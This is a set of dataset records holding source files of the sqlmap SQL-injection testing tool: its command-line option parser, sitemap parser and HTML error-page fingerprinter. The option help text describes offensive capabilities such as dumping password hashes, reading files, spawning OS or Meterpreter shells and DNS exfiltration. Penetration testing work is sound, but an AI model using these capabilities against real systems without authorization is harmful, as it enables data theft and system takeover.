        request.add_option("--ignore-401", dest="ignore401", action="store_true", help="Ignore HTTP Error 401 (Unauthorized)")
        request.add_option("--proxy", dest="proxy", help="Use a proxy to connect to the target URL")
        request.add_option("--proxy-cred", dest="proxyCred", help="Proxy authentication credentials (name:password)")
        request.add_option("--proxy-file", dest="proxyFile", help="Load proxy list from a file")
        request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", help="Ignore system default proxy settings")
        request.add_option("--tor", dest="tor", action="store_true", help="Use Tor anonymity network")
        request.add_option("--tor-port", dest="torPort", help="Set Tor proxy port other than default")
        request.add_option("--tor-type", dest="torType", help="Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)")
        request.add_option("--check-tor", dest="checkTor", action="store_true", help="Check to see if Tor is used properly")
        request.add_option("--delay", dest="delay", type="float", help="Delay in seconds between each HTTP request")
        request.add_option("--timeout", dest="timeout", type="float", help="Seconds to wait before timeout connection (default %d)" % defaults.timeout)
        request.add_option("--retries", dest="retries", type="int", help="Retries when the connection timeouts (default %d)" % defaults.retries)
        request.add_option("--randomize", dest="rParam", help="Randomly change value for given parameter(s)")
        request.add_option("--safe-url", dest="safUrl", help="URL address to visit frequently during testing")
        request.add_option("--safe-freq", dest="saFreq", type="int", help="Test requests between two visits to a given safe URL")
        request.add_option("--skip-urlencode", dest="skipUrlEncode", action="store_true", help="Skip URL encoding of payload data")
        request.add_option("--csrf-token", dest="csrfToken", help="Parameter used to hold CSRF protection token")
        request.add_option("--csrf-url", dest="csrfUrl", help="URL address to visit to extract CSRF protection token")
        request.add_option("--force-ssl", dest="forceSSL", action="store_true", help="Force usage of SSL/HTTPS")
        request.add_option("--hpp", dest="hpp", action="store_true", help="Use HTTP parameter pollution method")
        request.add_option("--eval", dest="evalCode", help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")

        # Optimization options
        optimization = OptionGroup(parser, "Optimization", "These options can be used to optimize the performance of sqlmap")
        optimization.add_option("-o", dest="optimize", action="store_true", help="Turn on all optimization switches")
        optimization.add_option("--predict-output", dest="predictOutput", action="store_true", help="Predict common queries output")
        optimization.add_option("--keep-alive", dest="keepAlive", action="store_true", help="Use persistent HTTP(s) connections")
        optimization.add_option("--null-connection", dest="nullConnection", action="store_true", help="Retrieve page length without actual HTTP response body")
        optimization.add_option("--threads", dest="threads", type="int", help="Max number of concurrent HTTP(s) requests (default %d)" % defaults.threads)

        # Injection options
        injection = OptionGroup(parser, "Injection", "These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts")
        injection.add_option("-p", dest="testParameter", help="Testable parameter(s)")
        injection.add_option("--skip", dest="skip", help="Skip testing for given parameter(s)")
        injection.add_option("--dbms", dest="dbms", help="Force back-end DBMS to this value")
        injection.add_option("--dbms-cred", dest="dbmsCred", help="DBMS authentication credentials (user:password)")
        injection.add_option("--os", dest="os", help="Force back-end DBMS operating system to this value")
        injection.add_option("--invalid-bignum", dest="invalidBignum", action="store_true", help="Use big numbers for invalidating values")
        injection.add_option("--invalid-logical", dest="invalidLogical", action="store_true", help="Use logical operations for invalidating values")
        injection.add_option("--invalid-string", dest="invalidString", action="store_true", help="Use random strings for invalidating values")
        injection.add_option("--no-cast", dest="noCast", action="store_true", help="Turn off payload casting mechanism")
        injection.add_option("--no-escape", dest="noEscape", action="store_true", help="Turn off string escaping mechanism")
        injection.add_option("--prefix", dest="prefix", help="Injection payload prefix string")
        injection.add_option("--suffix", dest="suffix", help="Injection payload suffix string")
        injection.add_option("--tamper", dest="tamper", help="Use given script(s) for tampering injection data")

        # Detection options
        detection = OptionGroup(parser, "Detection", "These options can be used to customize the detection phase")
        detection.add_option("--level", dest="level", type="int", help="Level of tests to perform (1-5, default %d)" % defaults.level)
        detection.add_option("--risk", dest="risk", type="int", help="Risk of tests to perform (0-3, default %d)" % defaults.risk)
        detection.add_option("--string", dest="string", help="String to match when query is evaluated to True")
        detection.add_option("--not-string", dest="notString", help="String to match when query is evaluated to False")
        detection.add_option("--regexp", dest="regexp", help="Regexp to match when query is evaluated to True")
        detection.add_option("--code", dest="code", type="int", help="HTTP code to match when query is evaluated to True")
        detection.add_option("--text-only", dest="textOnly", action="store_true", help="Compare pages based only on the textual content")
        detection.add_option("--titles", dest="titles", action="store_true", help="Compare pages based only on their titles")

        # Techniques options
        techniques = OptionGroup(parser, "Techniques", "These options can be used to tweak testing of specific SQL injection techniques")
        techniques.add_option("--technique", dest="tech", help="SQL injection techniques to use (default \"%s\")" % defaults.tech)
        techniques.add_option("--time-sec", dest="timeSec", type="int", help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)
        techniques.add_option("--union-cols", dest="uCols", help="Range of columns to test for UNION query SQL injection")
        techniques.add_option("--union-char", dest="uChar", help="Character to use for bruteforcing number of columns")
        techniques.add_option("--union-from", dest="uFrom", help="Table to use in FROM part of UNION query SQL injection")
        techniques.add_option("--dns-domain", dest="dnsName", help="Domain name used for DNS exfiltration attack")
        techniques.add_option("--second-order", dest="secondOrder", help="Resulting page URL searched for second-order response")

        # Fingerprint options
        fingerprint = OptionGroup(parser, "Fingerprint")
        fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", action="store_true", help="Perform an extensive DBMS version fingerprint")

        # Enumeration options
        enumeration = OptionGroup(parser, "Enumeration", "These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements")
        enumeration.add_option("-a", "--all", dest="getAll", action="store_true", help="Retrieve everything")
        enumeration.add_option("-b", "--banner", dest="getBanner", action="store_true", help="Retrieve DBMS banner")
        enumeration.add_option("--current-user", dest="getCurrentUser", action="store_true", help="Retrieve DBMS current user")
        enumeration.add_option("--current-db", dest="getCurrentDb", action="store_true", help="Retrieve DBMS current database")
        enumeration.add_option("--hostname", dest="getHostname", action="store_true", help="Retrieve DBMS server hostname")
        enumeration.add_option("--is-dba", dest="isDba", action="store_true", help="Detect if the DBMS current user is DBA")
        enumeration.add_option("--users", dest="getUsers", action="store_true", help="Enumerate DBMS users")
        enumeration.add_option("--passwords", dest="getPasswordHashes", action="store_true", help="Enumerate DBMS users password hashes")
        enumeration.add_option("--privileges", dest="getPrivileges", action="store_true", help="Enumerate DBMS users privileges")
        enumeration.add_option("--roles", dest="getRoles", action="store_true", help="Enumerate DBMS users roles")
        enumeration.add_option("--dbs", dest="getDbs", action="store_true", help="Enumerate DBMS databases")
        enumeration.add_option("--tables", dest="getTables", action="store_true", help="Enumerate DBMS database tables")
        enumeration.add_option("--columns", dest="getColumns", action="store_true", help="Enumerate DBMS database table columns")
        enumeration.add_option("--schema", dest="getSchema", action="store_true", help="Enumerate DBMS schema")
        enumeration.add_option("--count", dest="getCount", action="store_true", help="Retrieve number of entries for table(s)")
        enumeration.add_option("--dump", dest="dumpTable", action="store_true", help="Dump DBMS database table entries")
        enumeration.add_option("--dump-all", dest="dumpAll", action="store_true", help="Dump all DBMS databases tables entries")
        enumeration.add_option("--search", dest="search", action="store_true", help="Search column(s), table(s) and/or database name(s)")
        enumeration.add_option("--comments", dest="getComments", action="store_true", help="Retrieve DBMS comments")
        enumeration.add_option("-D", dest="db", help="DBMS database to enumerate")
        enumeration.add_option("-T", dest="tbl", help="DBMS database table(s) to enumerate")
        enumeration.add_option("-C", dest="col", help="DBMS database table column(s) to enumerate")
        enumeration.add_option("-X", dest="excludeCol", help="DBMS database table column(s) to not enumerate")
        enumeration.add_option("-U", dest="user", help="DBMS user to enumerate")
        enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", action="store_true", help="Exclude DBMS system databases when enumerating tables")
        enumeration.add_option("--where", dest="dumpWhere", help="Use WHERE condition while table dumping")
        enumeration.add_option("--start", dest="limitStart", type="int", help="First query output entry to retrieve")
        enumeration.add_option("--stop", dest="limitStop", type="int", help="Last query output entry to retrieve")
        enumeration.add_option("--first", dest="firstChar", type="int", help="First query output word character to retrieve")
        enumeration.add_option("--last", dest="lastChar", type="int", help="Last query output word character to retrieve")
        enumeration.add_option("--sql-query", dest="query", help="SQL statement to be executed")
        enumeration.add_option("--sql-shell", dest="sqlShell", action="store_true", help="Prompt for an interactive SQL shell")
        enumeration.add_option("--sql-file", dest="sqlFile", help="Execute SQL statements from given file(s)")

        # Brute force options
        brute = OptionGroup(parser, "Brute force", "These options can be used to run brute force checks")
        brute.add_option("--common-tables", dest="commonTables", action="store_true", help="Check existence of common tables")
        brute.add_option("--common-columns", dest="commonColumns", action="store_true", help="Check existence of common columns")

        # User-defined function options
        udf = OptionGroup(parser, "User-defined function injection", "These options can be used to create custom user-defined functions")
        udf.add_option("--udf-inject", dest="udfInject", action="store_true", help="Inject custom user-defined functions")
        udf.add_option("--shared-lib", dest="shLib", help="Local path of the shared library")

        # File system options
        filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system")
        filesystem.add_option("--file-read", dest="rFile", help="Read a file from the back-end DBMS file system")
        filesystem.add_option("--file-write", dest="wFile", help="Write a local file on the back-end DBMS file system")
        filesystem.add_option("--file-dest", dest="dFile", help="Back-end DBMS absolute filepath to write to")

        # Takeover options
        takeover = OptionGroup(parser, "Operating system access", "These options can be used to access the back-end database management system underlying operating system")
        takeover.add_option("--os-cmd", dest="osCmd", help="Execute an operating system command")
        takeover.add_option("--os-shell", dest="osShell", action="store_true", help="Prompt for an interactive operating system shell")
        takeover.add_option("--os-pwn", dest="osPwn", action="store_true", help="Prompt for an OOB shell, Meterpreter or VNC")
        takeover.add_option("--os-smbrelay", dest="osSmb", action="store_true", help="One click prompt for an OOB shell, Meterpreter or VNC")
        takeover.add_option("--os-bof", dest="osBof", action="store_true", help="Stored procedure buffer overflow exploitation")
        takeover.add_option("--priv-esc", dest="privEsc", action="store_true", help="Database process user privilege escalation")
        takeover.add_option("--msf-path", dest="msfPath", help="Local path where Metasploit Framework is installed")
        takeover.add_option("--tmp-path", dest="tmpPath", help="Remote absolute path of temporary files directory")

        # Windows registry options
        windows = OptionGroup(parser, "Windows registry access", "These options can be used to access the back-end database management system Windows registry")
        windows.add_option("--reg-read", dest="regRead", action="store_true", help="Read a Windows registry key value")
        windows.add_option("--reg-add", dest="regAdd", action="store_true", help="Write a Windows registry key value data")
        windows.add_option("--reg-del", dest="regDel", action="store_true", help="Delete a Windows registry key value")
        windows.add_option("--reg-key", dest="regKey", help="Windows registry key")
        windows.add_option("--reg-value", dest="regVal", help="Windows registry key value")
        windows.add_option("--reg-data", dest="regData", help="Windows registry key value data")
        windows.add_option("--reg-type", dest="regType", help="Windows registry key value type")

        # General options
        general = OptionGroup(parser, "General", "These options can be used to set some general working parameters")
        #general.add_option("-x", dest="xmlFile", help="Dump the data into an XML file")
        general.add_option("-s", dest="sessionFile", help="Load session from a stored (.sqlite) file")
        general.add_option("-t", dest="trafficFile", help="Log all HTTP traffic into a textual file")
        general.add_option("--batch", dest="batch", action="store_true", help="Never ask for user input, use the default behaviour")
        general.add_option("--charset", dest="charset", help="Force character encoding used for data retrieval")
        general.add_option("--crawl", dest="crawlDepth", type="int", help="Crawl the website starting from the target URL")
        general.add_option("--csv-del", dest="csvDel", help="Delimiting character used in CSV output (default \"%s\")" % defaults.csvDel)
        general.add_option("--dump-format", dest="dumpFormat", help="Format of dumped data (CSV (default), HTML or SQLITE)")
        general.add_option("--eta", dest="eta", action="store_true", help="Display for each output the estimated time of arrival")
        general.add_option("--flush-session", dest="flushSession", action="store_true", help="Flush session files for current target")
        general.add_option("--forms", dest="forms", action="store_true", help="Parse and test forms on target URL")
        general.add_option("--fresh-queries", dest="freshQueries", action="store_true", help="Ignore query results stored in session file")
        general.add_option("--hex", dest="hexConvert", action="store_true", help="Use DBMS hex function(s) for data retrieval")
        general.add_option("--output-dir", dest="outputDir", action="store", help="Custom output directory path")
        general.add_option("--parse-errors", dest="parseErrors", action="store_true", help="Parse and display DBMS error messages from responses")
        general.add_option("--pivot-column", dest="pivotColumn", help="Pivot column name")
        general.add_option("--save", dest="saveCmdline", action="store_true", help="Save options to a configuration INI file")
        general.add_option("--scope", dest="scope", help="Regexp to filter targets from provided proxy log")
        general.add_option("--test-filter", dest="testFilter", help="Select tests by payloads and/or titles (e.g. ROW)")
        general.add_option("--update", dest="updateAll", action="store_true", help="Update sqlmap")

        # Miscellaneous options
        miscellaneous = OptionGroup(parser, "Miscellaneous")
        miscellaneous.add_option("-z", dest="mnemonics", help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")
        miscellaneous.add_option("--alert", dest="alert", help="Run host OS command(s) when SQL injection is found")
        miscellaneous.add_option("--answers", dest="answers", help="Set question answers (e.g. \"quit=N,follow=N\")")
        miscellaneous.add_option("--beep", dest="beep", action="store_true", help="Make a beep sound when SQL injection is found")
        miscellaneous.add_option("--check-waf", dest="checkWaf", action="store_true", help="Heuristically check for WAF/IPS/IDS protection")
        miscellaneous.add_option("--cleanup", dest="cleanup", action="store_true", help="Clean up the DBMS from sqlmap specific UDF and tables")
        miscellaneous.add_option("--dependencies", dest="dependencies", action="store_true", help="Check for missing (non-core) sqlmap dependencies")
        miscellaneous.add_option("--disable-coloring", dest="disableColoring", action="store_true", help="Disable console output coloring")
        miscellaneous.add_option("--gpage", dest="googlePage", type="int", help="Use Google dork results from specified page number")
        miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true", help="Make a thorough testing for a WAF/IPS/IDS protection")
        miscellaneous.add_option("--mobile", dest="mobile", action="store_true", help="Imitate smartphone through HTTP User-Agent header")
        miscellaneous.add_option("--page-rank", dest="pageRank", action="store_true", help="Display page rank (PR) for Google dork results")
        miscellaneous.add_option("--purge-output", dest="purgeOutput", action="store_true", help="Safely remove all content from output directory")
        miscellaneous.add_option("--smart", dest="smart", action="store_true", help="Conduct thorough tests only if positive heuristic(s)")
        miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true", help="Prompt for an interactive sqlmap shell")
        miscellaneous.add_option("--wizard", dest="wizard", action="store_true", help="Simple wizard interface for beginner users")

        # Hidden and/or experimental options
        parser.add_option("--dummy", dest="dummy", action="store_true", help=SUPPRESS_HELP)
        parser.add_option("--pickled-options", dest="pickledOptions", help=SUPPRESS_HELP)
        parser.add_option("--profile", dest="profile", action="store_true", help=SUPPRESS_HELP)
        parser.add_option("--binary-fields", dest="binaryFields", help=SUPPRESS_HELP)
        parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int", help=SUPPRESS_HELP)
        parser.add_option("--force-dns", dest="forceDns", action="store_true", help=SUPPRESS_HELP)
        parser.add_option("--smoke-test", dest="smokeTest", action="store_true", help=SUPPRESS_HELP)
        parser.add_option("--live-test", dest="liveTest", action="store_true", help=SUPPRESS_HELP)
        parser.add_option("--stop-fail", dest="stopFail", action="store_true", help=SUPPRESS_HELP)
        parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP)

        parser.add_option_group(target)
        parser.add_option_group(request)
        parser.add_option_group(optimization)
        parser.add_option_group(injection)
        parser.add_option_group(detection)
        parser.add_option_group(techniques)
        parser.add_option_group(fingerprint)
        parser.add_option_group(enumeration)
        parser.add_option_group(brute)
        parser.add_option_group(udf)
        parser.add_option_group(filesystem)
        parser.add_option_group(takeover)
        parser.add_option_group(windows)
        parser.add_option_group(general)
        parser.add_option_group(miscellaneous)

        # Dirty hack to display longer options without breaking into two lines
        def _(self, *args):
            _ = parser.formatter._format_option_strings(*args)
            if len(_) > MAX_HELP_OPTION_LENGTH:
                _ = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % _
            return _

        parser.formatter._format_option_strings = parser.formatter.format_option_strings
        parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser, type(parser))

        # Dirty hack for making a short option -hh
        option = parser.get_option("--hh")
        option._short_opts = ["-hh"]
        option._long_opts = []

        # Dirty hack for inherent help message of switch -h
        option = parser.get_option("-h")
        option.help = option.help.capitalize().replace("this help", "basic help")

        argv = []
        prompt = False
        advancedHelp = True

        for arg in sys.argv:
            argv.append(getUnicode(arg, encoding=sys.stdin.encoding))

        checkDeprecatedOptions(argv)

        prompt = "--sqlmap-shell" in argv

        if prompt:
            parser.usage = ""
            cmdLineOptions.sqlmapShell = True

            _ = ["x", "q", "exit", "quit", "clear"]

            for option in parser.option_list:
                _.extend(option._long_opts)
                _.extend(option._short_opts)

            for group in parser.option_groups:
                for option in group.option_list:
                    _.extend(option._long_opts)
                    _.extend(option._short_opts)

            autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=_)

            while True:
                command = None

                try:
                    command = raw_input("sqlmap-shell> ").strip()
                except (KeyboardInterrupt, EOFError):
                    print
                    raise SqlmapShellQuitException

                if not command:
                    continue
                elif command.lower() == "clear":
                    clearHistory()
                    print "[i] history cleared"
                    saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
                elif command.lower() in ("x", "q", "exit", "quit"):
                    raise SqlmapShellQuitException
                elif command[0] != '-':
                    print "[!] invalid option(s) provided"
                    print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'"
                else:
                    saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
                    loadHistory(AUTOCOMPLETE_TYPE.SQLMAP)
                    break

            for arg in shlex.split(command):
                argv.append(getUnicode(arg, encoding=sys.stdin.encoding))

        # Hide non-basic options in basic help case
        for i in xrange(len(argv)):
            if argv[i] == "-hh":
                argv[i] = "-h"
            elif argv[i] == "--version":
                print VERSION_STRING.split('/')[-1]
                raise SystemExit
            elif argv[i] == "-h":
                advancedHelp = False
                for group in parser.option_groups[:]:
                    found = False
                    for option in group.option_list:
                        if option.dest not in BASIC_HELP_ITEMS:
                            option.help = SUPPRESS_HELP
                        else:
                            found = True
                    if not found:
                        parser.option_groups.remove(group)

        try:
            (args, _) = parser.parse_args(argv)
        except UnicodeEncodeError, ex:
            print "\n[!] %s" % ex.object.encode("unicode-escape")
            raise SystemExit
        except SystemExit:
            if "-h" in argv and not advancedHelp:
                print "\n[!] to see full list of options run with '-hh'"
            raise

        # Expand given mnemonic options (e.g. -z "ign,flu,bat")
        for i in xrange(len(argv) - 1):
            if argv[i] == "-z":
                expandMnemonics(argv[i + 1], parser, args)

        if args.dummy:
            args.url = args.url or DUMMY_URL

        if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \
                    args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
                    args.purgeOutput, args.pickledOptions, args.sitemapUrl)):
            errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
            errMsg += "use -h for basic or -hh for advanced help"
            parser.error(errMsg)

        return args

    except (OptionError, TypeError), e:
        parser.error(e)

    except SystemExit:
        # Protection against Windows dummy double clicking
        if IS_WIN:
            print "\nPress Enter to continue...",
            raw_input()
        raise

    debugMsg = "parsing command line"
    logger.debug(debugMsg)
40,343
Python
.py
667
41.113943
141
0.527152
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
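Illustrative usage for lib/parse/cmdline.py above (not part of the dataset record): cmdLineParser() reads sys.argv directly, so it can be driven programmatically by faking argv before the call (assumes the sqlmap tree is importable).

import sys

from lib.parse.cmdline import cmdLineParser

sys.argv = ["sqlmap.py", "-u", "http://testphp.vulnweb.com/artists.php?artist=1", "--banner"]
args = cmdLineParser()
print args.url, args.getBanner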
18,997
sitemap.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/parse/sitemap.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import httplib
import re

from lib.core.common import readInput
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapSyntaxException
from lib.request.connect import Connect as Request
from thirdparty.oset.pyoset import oset

abortedFlag = None

def parseSitemap(url, retVal=None):
    global abortedFlag

    if retVal is not None:
        logger.debug("parsing sitemap '%s'" % url)

    try:
        if retVal is None:
            abortedFlag = False
            retVal = oset()

        try:
            content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
        except httplib.InvalidURL:
            errMsg = "invalid URL given for sitemap ('%s')" % url
            raise SqlmapSyntaxException, errMsg

        for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
            if abortedFlag:
                break
            url = match.group(1).strip()
            if url.endswith(".xml") and "sitemap" in url.lower():
                if kb.followSitemapRecursion is None:
                    message = "sitemap recursion detected. Do you want to follow? [y/N] "
                    test = readInput(message, default="N")
                    kb.followSitemapRecursion = test[0] in ("y", "Y")
                if kb.followSitemapRecursion:
                    parseSitemap(url, retVal)
            else:
                retVal.add(url)
    except KeyboardInterrupt:
        abortedFlag = True
        warnMsg = "user aborted during sitemap parsing. sqlmap "
        warnMsg += "will use partial list"
        logger.warn(warnMsg)

    return retVal
1,782
Python
.py
46
30.021739
91
0.626087
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
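Illustrative sketch for lib/parse/sitemap.py above (not part of the dataset record): a standalone rerun of the <loc> extraction that parseSitemap() applies to fetched sitemap XML.

import re

content = """<?xml version="1.0" encoding="UTF-8"?>
<urlset>
  <url><loc>http://example.com/page.php?id=1</loc></url>
  <url><loc>http://example.com/sitemap-news.xml</loc></url>
</urlset>"""

for match in re.finditer(r"<loc>\s*([^<]+)", content):
    print match.group(1).strip()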
18,998
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/parse/__init__.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,999
html.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/parse/html.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import re

from xml.sax.handler import ContentHandler

from lib.core.common import checkFile
from lib.core.common import parseXmlFile
from lib.core.data import kb
from lib.core.data import paths
from lib.core.threads import getCurrentThreadData

class HTMLHandler(ContentHandler):
    """
    This class defines methods to parse the input HTML page to
    fingerprint the back-end database management system
    """

    def __init__(self, page):
        ContentHandler.__init__(self)

        self._dbms = None
        self._page = page

        self.dbms = None

    def _markAsErrorPage(self):
        threadData = getCurrentThreadData()
        threadData.lastErrorPage = (threadData.lastRequestUID, self._page)

    def startElement(self, name, attrs):
        if name == "dbms":
            self._dbms = attrs.get("value")
        elif name == "error":
            if re.search(attrs.get("regexp"), self._page, re.I):
                self.dbms = self._dbms
                self._markAsErrorPage()

def htmlParser(page):
    """
    This function calls a class that parses the input HTML page to
    fingerprint the back-end database management system
    """
    xmlfile = paths.ERRORS_XML
    checkFile(xmlfile)

    handler = HTMLHandler(page)
    parseXmlFile(xmlfile, handler)

    if handler.dbms and handler.dbms not in kb.htmlFp:
        kb.lastParserStatus = handler.dbms
        kb.htmlFp.append(handler.dbms)
    else:
        kb.lastParserStatus = None

    # generic SQL warning/error messages
    if re.search(r"SQL (warning|error|syntax)", page, re.I):
        handler._markAsErrorPage()

    return handler.dbms
1,780
Python
.py
50
29.62
74
0.687682
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
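Illustrative sketch for lib/parse/html.py above (not part of the dataset record): the same regexp-per-DBMS matching HTMLHandler performs, with a tiny inline rule set standing in for the errors.xml fingerprint database.

import re

rules = (
    ("MySQL", r"SQL syntax.*?MySQL"),
    ("PostgreSQL", r"PostgreSQL.*?ERROR"),
)

page = "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version"
for dbms, regexp in rules:
    if re.search(regexp, page, re.I):
        print "fingerprinted:", dbms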